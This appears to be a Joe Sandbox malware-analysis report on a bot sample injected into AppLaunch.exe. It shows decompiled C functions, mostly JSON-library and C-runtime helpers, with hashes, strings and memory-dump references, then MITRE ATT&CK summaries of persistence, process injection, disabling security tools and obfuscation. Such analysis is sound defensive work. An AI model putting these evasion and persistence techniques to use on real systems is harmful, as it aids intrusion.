Opcode Fuzzy Hash: dce0871265d88577453e73d59efbf281f77ae7eb014534d9a926f300e1176512
Instruction Fuzzy Hash: 2D1160B5D04209AACB04EBE1EC52AEFB378AB54308F00456EE50576182FB796609CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040C880 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040C880(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v5;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v32;
				signed char _t29;

				E00414F10( &_v5);
				E00414B10( &_v12,  &_v5);
				E00404770( &_v32, E0041A5B0( &_v5, 1),  &_v12);
				_v16 = E004075F0(_a4);
				_v20 = E0041A400( &_v32);
				E0040C0F0( &_v5, _v20, _v16);
				_t29 = E00406080( &_v32,  &_v32, 0);
				_t46 = _t29 & 0x000000ff;
				_t55 = _t29 & 0x000000ff;
				if((_t29 & 0x000000ff) == 0) {
					_push(0x44b5);
					E00430DB7(__ebx, _t46, __edi, __esi, _t55, L"obj != nullptr", L"C:\\Users\\root\\Desktop\\bot v2\\json.hpp");
				}
				_v24 = E00419BE0( &_v32);
				E00416BA0( &_v32);
				return _v24;
			}

0x0040c889
0x0040c895
0x0040c8b0
0x0040c8c1
0x0040c8cc
0x0040c8db
0x0040c8e9
0x0040c8f1
0x0040c8f4
0x0040c8f6
0x0040c8f8
0x0040c907
0x0040c90c
0x0040c917
0x0040c91d
0x0040c928

APIs

Part of subcall function 0041A5B0: _Allocate.LIBCONCRTD ref: 0041A5C0

operator!=.LIBCPMTD ref: 0040C8E9

Strings

obj != nullptr, xrefs: 0040C902
C:\Users\root\Desktop\bot v2\json.hpp, xrefs: 0040C8FD

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: Allocateoperator!=
String ID: C:\Users\root\Desktop\bot v2\json.hpp$obj != nullptr
API String ID: 1702145254-3474634137
Opcode ID: 24f8e3946d5df31a07b2028b8a75a0aef5a89715ef690484ce270eab90eda5d0
Instruction ID: 9d09af3221b27e8d4567f889d5844436e40f6df33b4cbad6a7e5694009383966
Opcode Fuzzy Hash: 24f8e3946d5df31a07b2028b8a75a0aef5a89715ef690484ce270eab90eda5d0
Instruction Fuzzy Hash: AF116DB5D04209ABCB04EBE1EC52AEFB378AB54308F00416AE50576182FB796619CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040C9C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040C9C0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v5;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v32;
				signed char _t29;

				E00414F10( &_v5);
				E00414B10( &_v12,  &_v5);
				E00404770( &_v32, E0041A5D0( &_v5, 1),  &_v12);
				_v16 = E004075F0(_a4);
				_v20 = E0041A400( &_v32);
				E0040C160( &_v5, _v20, _v16);
				_t29 = E00406080( &_v32,  &_v32, 0);
				_t46 = _t29 & 0x000000ff;
				_t55 = _t29 & 0x000000ff;
				if((_t29 & 0x000000ff) == 0) {
					_push(0x44b5);
					E00430DB7(__ebx, _t46, __edi, __esi, _t55, L"obj != nullptr", L"C:\\Users\\root\\Desktop\\bot v2\\json.hpp");
				}
				_v24 = E00419BE0( &_v32);
				E00416BE0( &_v32);
				return _v24;
			}

0x0040c9c9
0x0040c9d5
0x0040c9f0
0x0040ca01
0x0040ca0c
0x0040ca1b
0x0040ca29
0x0040ca31
0x0040ca34
0x0040ca36
0x0040ca38
0x0040ca47
0x0040ca4c
0x0040ca57
0x0040ca5d
0x0040ca68

APIs

Part of subcall function 0041A5D0: _Allocate.LIBCONCRTD ref: 0041A5E0

operator!=.LIBCPMTD ref: 0040CA29

Strings

obj != nullptr, xrefs: 0040CA42
C:\Users\root\Desktop\bot v2\json.hpp, xrefs: 0040CA3D

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: Allocateoperator!=
String ID: C:\Users\root\Desktop\bot v2\json.hpp$obj != nullptr
API String ID: 1702145254-3474634137
Opcode ID: 9199d8d95dbcb063946dbffd9108389a5c425140f16dc8b66af5b99b634fe37a
Instruction ID: 2fc0e6dbbfb141921e6f482e7aabec8cfcd6092ce861c2fca6dbb7bff5b37b5e
Opcode Fuzzy Hash: 9199d8d95dbcb063946dbffd9108389a5c425140f16dc8b66af5b99b634fe37a
Instruction Fuzzy Hash: 081182B5D04209ABCB04EBE1EC52EEFB378AF54304F00416EF50576182FB796619CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040CB00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040CB00(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				char _v5;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v32;
				signed char _t29;

				E00414F10( &_v5);
				E00414B10( &_v12,  &_v5);
				E00404770( &_v32, E0041A5F0( &_v5, 1),  &_v12);
				_v16 = E004075F0(_a4);
				_v20 = E0041A400( &_v32);
				E0040C1D0(__eflags,  &_v5, _v20, _v16);
				_t29 = E00406080( &_v32,  &_v32, 0);
				_t46 = _t29 & 0x000000ff;
				_t56 = _t29 & 0x000000ff;
				if((_t29 & 0x000000ff) == 0) {
					_push(0x44b5);
					E00430DB7(__ebx, _t46, __edi, __esi, _t56, L"obj != nullptr", L"C:\\Users\\root\\Desktop\\bot v2\\json.hpp");
				}
				_v24 = E00419BE0( &_v32);
				E00416C20( &_v32);
				return _v24;
			}

0x0040cb09
0x0040cb15
0x0040cb30
0x0040cb41
0x0040cb4c
0x0040cb5b
0x0040cb69
0x0040cb71
0x0040cb74
0x0040cb76
0x0040cb78
0x0040cb87
0x0040cb8c
0x0040cb97
0x0040cb9d
0x0040cba8

APIs

Part of subcall function 0041A5F0: _Allocate.LIBCONCRTD ref: 0041A600

operator!=.LIBCPMTD ref: 0040CB69

Strings

obj != nullptr, xrefs: 0040CB82
C:\Users\root\Desktop\bot v2\json.hpp, xrefs: 0040CB7D

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: Allocateoperator!=
String ID: C:\Users\root\Desktop\bot v2\json.hpp$obj != nullptr
API String ID: 1702145254-3474634137
Opcode ID: f92870a0d8f2f45be997149537d992c4cc69b18b0510b7180e6141676d3a4c54
Instruction ID: 49fa0102d4074d3def66d9ef05e9105cd434fcf48f9fed2192d8431e14f7832d
Opcode Fuzzy Hash: f92870a0d8f2f45be997149537d992c4cc69b18b0510b7180e6141676d3a4c54
Instruction Fuzzy Hash: EA1160B5D04209AACB04EBE1EC52EEFB378AB54304F00456EE90566182FB796609CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004323BD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E004323BD(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t1;
				signed int _t2;
				intOrPtr _t5;
				signed int _t6;
				void* _t25;
				signed int _t26;
				void* _t28;
				void* _t33;
				void* _t34;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				long _t40;
				void* _t43;

				_t33 = __edx;
				_t28 = __ecx;
				_t25 = __ebx;
				_t1 =  *0x4c6260; // 0x6
				_push(_t39);
				_t45 = _t1 - 0xffffffff;
				if(_t1 == 0xffffffff) {
					L5:
					_t2 = E00432FF4(__eflags, _t1, 0xffffffff);
					__eflags = _t2;
					if(_t2 == 0) {
						goto L14;
					} else {
						_t39 = E00436150(1, 0x364);
						_pop(_t28);
						__eflags = _t39;
						if(__eflags != 0) {
							__eflags = E00432FF4(__eflags,  *0x4c6260, _t39);
							if(__eflags != 0) {
								E0043212E(_t39, "hbL");
								E00432BD6(0);
								_t43 = _t43 + 0xc;
								goto L12;
							} else {
								E00432FF4(__eflags,  *0x4c6260, _t17);
								_push(_t39);
								goto L8;
							}
						} else {
							E00432FF4(__eflags,  *0x4c6260, _t16);
							_push(_t39);
							L8:
							E00432BD6();
							_pop(_t28);
							goto L14;
						}
					}
				} else {
					_t39 = E00432FB5(_t45, _t1);
					if(_t39 == 0) {
						_t1 =  *0x4c6260; // 0x6
						goto L5;
					} else {
						if(_t39 == 0xffffffff) {
							L14:
							E0042972B(_t25, _t28, _t33, _t34, _t39);
							asm("int3");
							_push(_t25);
							_push(_t39);
							_push(_t34);
							_t40 = GetLastError();
							_t5 =  *0x4c6260; // 0x6
							__eflags = _t5 - 0xffffffff;
							if(__eflags == 0) {
								L21:
								_t6 = E00432FF4(__eflags, _t5, 0xffffffff);
								__eflags = _t6;
								if(_t6 == 0) {
									goto L18;
								} else {
									_t35 = E00436150(1, 0x364);
									__eflags = _t35;
									if(__eflags != 0) {
										__eflags = E00432FF4(__eflags,  *0x4c6260, _t35);
										if(__eflags != 0) {
											E0043212E(_t35, "hbL");
											E00432BD6(0);
											goto L28;
										} else {
											_t26 = 0;
											E00432FF4(__eflags,  *0x4c6260, 0);
											_push(_t35);
											goto L24;
										}
									} else {
										_t26 = 0;
										__eflags = 0;
										E00432FF4(0,  *0x4c6260, 0);
										_push(0);
										L24:
										E00432BD6();
										goto L19;
									}
								}
							} else {
								_t35 = E00432FB5(__eflags, _t5);
								__eflags = _t35;
								if(__eflags == 0) {
									_t5 =  *0x4c6260; // 0x6
									goto L21;
								} else {
									__eflags = _t35 - 0xffffffff;
									if(_t35 != 0xffffffff) {
										L28:
										_t26 = _t35;
									} else {
										L18:
										_t26 = 0;
										__eflags = 0;
										L19:
										_t35 = _t26;
									}
								}
							}
							SetLastError(_t40);
							asm("sbb edi, edi");
							_t37 =  ~_t35 & _t26;
							__eflags = _t37;
							return _t37;
						} else {
							L12:
							if(_t39 == 0) {
								goto L14;
							} else {
								return _t39;
							}
						}
					}
				}
			}

0x004323bd
0x004323bd
0x004323bd
0x004323bd
0x004323c2
0x004323c3
0x004323c6
0x004323e0
0x004323e3
0x004323e8
0x004323ea
0x00000000
0x004323ec
0x004323f8
0x004323fb
0x004323fc
0x004323fe
0x00432421
0x00432423
0x0043243a
0x00432441
0x00432446
0x00000000
0x00432425
0x0043242c
0x00432431
0x00000000
0x00432431
0x00432400
0x00432407
0x0043240c
0x0043240d
0x0043240d
0x00432412
0x00000000
0x00432412
0x004323fe
0x004323c8
0x004323ce
0x004323d2
0x004323db
0x00000000
0x004323d4
0x004323d7
0x00432451
0x00432451
0x00432456
0x00432459
0x0043245a
0x0043245b
0x00432462
0x00432464
0x00432469
0x0043246c
0x0043248a
0x0043248d
0x00432492
0x00432494
0x00000000
0x00432496
0x004324a2
0x004324a6
0x004324a8
0x004324cd
0x004324cf
0x004324e8
0x004324ef
0x00000000
0x004324d1
0x004324d1
0x004324da
0x004324df
0x00000000
0x004324df
0x004324aa
0x004324aa
0x004324aa
0x004324b3
0x004324b8
0x004324b9
0x004324b9
0x00000000
0x004324be
0x004324a8
0x0043246e
0x00432474
0x00432476
0x00432478
0x00432485
0x00000000
0x0043247a
0x0043247a
0x0043247d
0x004324f7
0x004324f7
0x0043247f
0x0043247f
0x0043247f
0x0043247f
0x00432481
0x00432481
0x00432481
0x0043247d
0x00432478
0x004324fa
0x00432502
0x00432504
0x00432504
0x0043250b
0x004323d9
0x00432449
0x0043244b
0x00000000
0x0043244d
0x00432450
0x00432450
0x0043244b
0x004323d7
0x004323d2

APIs

_free.LIBCMT ref: 0043240D
_free.LIBCMT ref: 00432441

Strings

hbL, xrefs: 00432434

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: _free
String ID: hbL
API String ID: 269201875-2435073812
Opcode ID: 1a819e0e0cb5dc86e0f11841d040d9dfe3c645ab8bdf7250383c48153f701b8d
Instruction ID: 70bfcdba3c2bf5342e375452cc43ef9cd089cb541b332e1667da0c86fae2d24f
Opcode Fuzzy Hash: 1a819e0e0cb5dc86e0f11841d040d9dfe3c645ab8bdf7250383c48153f701b8d
Instruction Fuzzy Hash: 5901F73150D93276C92537356F02E6BB2086B1C738F21622BBE24A52E2D9DCCC4227DD

Uniqueness

Uniqueness Score: -1.00%

Function 0040C7F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0040C7F0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				char _v5;
				char _v12;
				intOrPtr _v16;
				char _v24;
				signed char _t22;

				E00414F10( &_v5);
				E00414B10( &_v12,  &_v5);
				E00404770( &_v24, E0041A5B0( &_v5, 1),  &_v12);
				E0040C0C0( &_v24, __eflags,  &_v5, E0041A400( &_v24));
				_t22 = E00406080( &_v24,  &_v24, 0);
				_t37 = _t22 & 0x000000ff;
				_t46 = _t22 & 0x000000ff;
				if((_t22 & 0x000000ff) == 0) {
					_push(0x44b5);
					E00430DB7(__ebx, _t37, __edi, __esi, _t46, L"obj != nullptr", L"C:\\Users\\root\\Desktop\\bot v2\\json.hpp");
				}
				_v16 = E00419BE0( &_v24);
				E00416BA0( &_v24);
				return _v16;
			}

0x0040c7f9
0x0040c805
0x0040c820
0x0040c832
0x0040c840
0x0040c848
0x0040c84b
0x0040c84d
0x0040c84f
0x0040c85e
0x0040c863
0x0040c86e
0x0040c874
0x0040c87f

APIs

Part of subcall function 0041A5B0: _Allocate.LIBCONCRTD ref: 0041A5C0

operator!=.LIBCPMTD ref: 0040C840

Strings

obj != nullptr, xrefs: 0040C859
C:\Users\root\Desktop\bot v2\json.hpp, xrefs: 0040C854

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: Allocateoperator!=
String ID: C:\Users\root\Desktop\bot v2\json.hpp$obj != nullptr
API String ID: 1702145254-3474634137
Opcode ID: 6c3b0aaeed2588e3f61a665d1634fbf7334f9e446b78f2160809f942ac00448d
Instruction ID: 8d8a884d22fafe12c7e6caa40f528c09aa17055d7868b89ecf192e9e1b00b9c9
Opcode Fuzzy Hash: 6c3b0aaeed2588e3f61a665d1634fbf7334f9e446b78f2160809f942ac00448d
Instruction Fuzzy Hash: 840184B5D44109A6CB04F7A1DC53EEEB3389B60709F40416AF901721C1FF796718C6AA

Uniqueness

Uniqueness Score: -1.00%

Function 0040C930 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E0040C930(void* __ebx, void* __edi, void* __esi) {
				char _v5;
				char _v12;
				intOrPtr _v16;
				char _v24;
				signed char _t22;

				E00414F10( &_v5);
				E00414B10( &_v12,  &_v5);
				E00404770( &_v24, E0041A5D0( &_v5, 1),  &_v12);
				E0040C130( &_v24,  &_v5, E0041A400( &_v24));
				_t22 = E00406080( &_v24,  &_v24, 0);
				_t37 = _t22 & 0x000000ff;
				_t45 = _t22 & 0x000000ff;
				if((_t22 & 0x000000ff) == 0) {
					_push(0x44b5);
					E00430DB7(__ebx, _t37, __edi, __esi, _t45, L"obj != nullptr", L"C:\\Users\\root\\Desktop\\bot v2\\json.hpp");
				}
				_v16 = E00419BE0( &_v24);
				E00416BE0( &_v24);
				return _v16;
			}

0x0040c939
0x0040c945
0x0040c960
0x0040c972
0x0040c980
0x0040c988
0x0040c98b
0x0040c98d
0x0040c98f
0x0040c99e
0x0040c9a3
0x0040c9ae
0x0040c9b4
0x0040c9bf

APIs

Part of subcall function 0041A5D0: _Allocate.LIBCONCRTD ref: 0041A5E0

operator!=.LIBCPMTD ref: 0040C980

Strings

obj != nullptr, xrefs: 0040C999
C:\Users\root\Desktop\bot v2\json.hpp, xrefs: 0040C994

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: Allocateoperator!=
String ID: C:\Users\root\Desktop\bot v2\json.hpp$obj != nullptr
API String ID: 1702145254-3474634137
Opcode ID: 63b32832b040d89e3af5a331bd3d4c2d8f80edf89e696b5ad756655137befa67
Instruction ID: 698980bb6bc34b2a27a2287df5fd15fe4fb348abb4d4c59ad64791f415076864
Opcode Fuzzy Hash: 63b32832b040d89e3af5a331bd3d4c2d8f80edf89e696b5ad756655137befa67
Instruction Fuzzy Hash: 180184B5D441096AC704E791DC53EEEB3389B64309F40416AF901761C2FF796718C6AA

Uniqueness

Uniqueness Score: -1.00%

Function 0040CA70 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E0040CA70(void* __ebx, void* __edi, void* __esi) {
				char _v5;
				char _v12;
				intOrPtr _v16;
				char _v24;
				signed char _t22;

				E00414F10( &_v5);
				E00414B10( &_v12,  &_v5);
				E00404770( &_v24, E0041A5F0( &_v5, 1),  &_v12);
				E0040C1A0( &_v24,  &_v5, E0041A400( &_v24));
				_t22 = E00406080( &_v24,  &_v24, 0);
				_t37 = _t22 & 0x000000ff;
				_t45 = _t22 & 0x000000ff;
				if((_t22 & 0x000000ff) == 0) {
					_push(0x44b5);
					E00430DB7(__ebx, _t37, __edi, __esi, _t45, L"obj != nullptr", L"C:\\Users\\root\\Desktop\\bot v2\\json.hpp");
				}
				_v16 = E00419BE0( &_v24);
				E00416C20( &_v24);
				return _v16;
			}

0x0040ca79
0x0040ca85
0x0040caa0
0x0040cab2
0x0040cac0
0x0040cac8
0x0040cacb
0x0040cacd
0x0040cacf
0x0040cade
0x0040cae3
0x0040caee
0x0040caf4
0x0040caff

APIs

Part of subcall function 0041A5F0: _Allocate.LIBCONCRTD ref: 0041A600

operator!=.LIBCPMTD ref: 0040CAC0

Strings

obj != nullptr, xrefs: 0040CAD9
C:\Users\root\Desktop\bot v2\json.hpp, xrefs: 0040CAD4

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: Allocateoperator!=
String ID: C:\Users\root\Desktop\bot v2\json.hpp$obj != nullptr
API String ID: 1702145254-3474634137
Opcode ID: f14afa0910b34a7a5cdc97be7320cf2b26ead82387db0b9001295cea2f8d8579
Instruction ID: c8339527088f886da440a027432f162ae756d45ab1b8018ab29cdab78681f1aa
Opcode Fuzzy Hash: f14afa0910b34a7a5cdc97be7320cf2b26ead82387db0b9001295cea2f8d8579
Instruction Fuzzy Hash: 210184B5D44109A6CB04FB91DC53EEEB3389B64309F40456AF901721C2FF796758C6A6

Uniqueness

Uniqueness Score: -1.00%

Function 00433036 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 37%

			E00433036(void* __eflags, struct _CRITICAL_SECTION* _a4, long _a8, intOrPtr _a12) {
				intOrPtr* _t11;

				_t11 = E00432DD5(0x12, "InitializeCriticalSectionEx", 0x446084, 0x44608c);
				if(_t11 == 0) {
					return InitializeCriticalSectionAndSpinCount(_a4, _a8);
				}
				 *0x440158(_a4, _a8, _a12);
				return  *_t11();
			}

0x00433052
0x00433059
0x00000000
0x00433076
0x00433066
0x00000000

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,00433772,-00000020,00000FA0,00000000,00402E09), ref: 00433076

Strings

4RB, xrefs: 00433066
InitializeCriticalSectionEx, xrefs: 00433046

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: 4RB$InitializeCriticalSectionEx
API String ID: 2593887523-2264572125
Opcode ID: 7cea1e32cd74c6ab02f69f065a6924e412419a317c29ee5e413b68e04ee57c33
Instruction ID: 2d833334b86c860c1e2d2d3e1b33b1aa02fa42498dbceeaa6913ee9c03619c42
Opcode Fuzzy Hash: 7cea1e32cd74c6ab02f69f065a6924e412419a317c29ee5e413b68e04ee57c33
Instruction Fuzzy Hash: 2CE0D835540218F7CF216F51DC05E9E7F25DF09B61F104122FE0C15261C6BA8971A7D9

Uniqueness

Uniqueness Score: -1.00%

Function 00432F37 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22
memoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00432F37(void* __eflags, intOrPtr _a4) {
				intOrPtr* _t7;

				_t7 = E00432DD5(3, "FlsAlloc", 0x445fec, 0x445ff4);
				if(_t7 == 0) {
					return TlsAlloc();
				}
				 *0x440158(_a4);
				return  *_t7();
			}

0x00432f53
0x00432f5a
0x00000000
0x00432f6b
0x00432f61
0x00000000

APIs

TlsAlloc.KERNEL32 ref: 00432F6B

Strings

FlsAlloc, xrefs: 00432F47
4RB, xrefs: 00432F61

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: Alloc
String ID: 4RB$FlsAlloc
API String ID: 2773662609-1146648027
Opcode ID: e269cde2195f18d61327a7893ab9cb5475dbe29bc57b80b793444e494913b871
Instruction ID: c09d5bdc98f2698c5eeaf6e46b9bec90ed03abe9dd19c451cc4ef8bee60086a3
Opcode Fuzzy Hash: e269cde2195f18d61327a7893ab9cb5475dbe29bc57b80b793444e494913b871
Instruction Fuzzy Hash: 69E0C23668462877E61137519C0AF5E7E18CB58F62F140023FE0465282DAF9495296DE

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

